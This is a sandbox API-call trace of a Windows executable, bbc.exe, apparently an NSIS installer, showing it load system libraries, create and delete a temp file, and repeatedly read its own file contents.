# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 22.01.2021 15:11:50.703 Process: id = "1" image_name = "bbc.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bbc.exe" page_root = "0x3ea7c000" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x848 [0043.300] SetErrorMode (uMode=0x8001) returned 0x0 [0043.311] GetVersion () returned 0x1db10106 [0043.312] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0043.312] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0043.312] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0043.312] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0043.312] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x750f0000 [0043.914] lstrlenA (lpString="UXTHEME") returned 7 [0043.914] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0043.914] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0043.914] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x755d0000 [0044.292] lstrlenA (lpString="USERENV") returned 7 [0044.292] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.292] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0044.292] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x76950000 [0046.357] lstrlenA (lpString="SETUPAPI") returned 8 [0046.357] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.357] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0046.357] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x75570000 [0046.728] lstrlenA (lpString="APPHELP") returned 7 [0046.728] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.728] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0046.728] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x75470000 [0047.152] lstrlenA (lpString="PROPSYS") returned 7 [0047.152] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.152] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0047.152] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x750d0000 [0047.370] lstrlenA (lpString="DWMAPI") returned 6 [0047.370] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.370] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0047.370] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x75790000 [0047.370] lstrlenA (lpString="CRYPTBASE") returned 9 [0047.370] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.370] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0047.370] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x75430000 [0047.847] lstrlenA (lpString="OLEACC") returned 6 [0047.847] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.847] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0047.847] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x77670000 [0048.276] lstrlenA (lpString="CLBCATQ") returned 7 [0048.277] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.277] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0048.277] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x75400000 [0048.792] lstrlenA (lpString="NTMARTA") returned 7 [0048.792] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0048.792] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.792] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0048.792] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x753f0000 [0048.940] GetProcAddress (hModule=0x753f0000, lpProcName="GetFileVersionInfoA") returned 0x753f1ced [0048.940] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0048.940] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.940] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0048.940] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x753e0000 [0048.944] GetProcAddress (hModule=0x753e0000, lpProcName="SHGetFolderPathA") returned 0x753e1528 [0048.944] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x772f0000 [0048.944] GetProcAddress (hModule=0x772f0000, lpProcName=0x1b5) returned 0x7730bee6 [0048.945] IsOS (dwOS=0x1e) returned 1 [0048.945] InitCommonControls () [0048.945] OleInitialize (pvReserved=0x0) returned 0x0 [0048.953] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x18fe2c, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x18fe2c) returned 0x1 [0049.988] lstrcpynA (in: lpString1=0x42ec00, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0049.989] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe\" " [0049.989] lstrcpynA (in: lpString1=0x435000, lpString2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe\" ") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe\" " [0049.990] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x436400 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0049.998] lstrlenA (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 36 [0049.998] lstrcatA (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\" [0049.998] CreateDirectoryA (lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0049.998] GetLastError () returned 0xb7 [0049.998] GetTickCount () returned 0x114602a [0049.998] GetTempFileNameA (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="nss", uUnique=0x0, lpTempFileName=0x436000 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\nssB7AA.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\nssb7aa.tmp")) returned 0xb7aa [0050.004] DeleteFileA (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\nssB7AA.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\nssb7aa.tmp")) returned 1 [0050.005] GetTickCount () returned 0x114602a [0050.005] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x436c00, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bbc.exe")) returned 0x2d [0050.005] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bbc.exe")) returned 0x20 [0050.005] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bbc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x17c [0050.006] lstrcpynA (in: lpString1=0x435c00, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe" [0050.006] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bbc.exe") returned 45 [0050.006] lstrcpynA (in: lpString1=0x437000, lpString2="bbc.exe", iMaxLength=1024 | out: lpString1="bbc.exe") returned="bbc.exe" [0050.006] GetFileSize (in: hFile=0x17c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161ee [0050.006] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.008] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.009] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.010] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.023] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.023] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.023] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.023] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.023] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.024] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 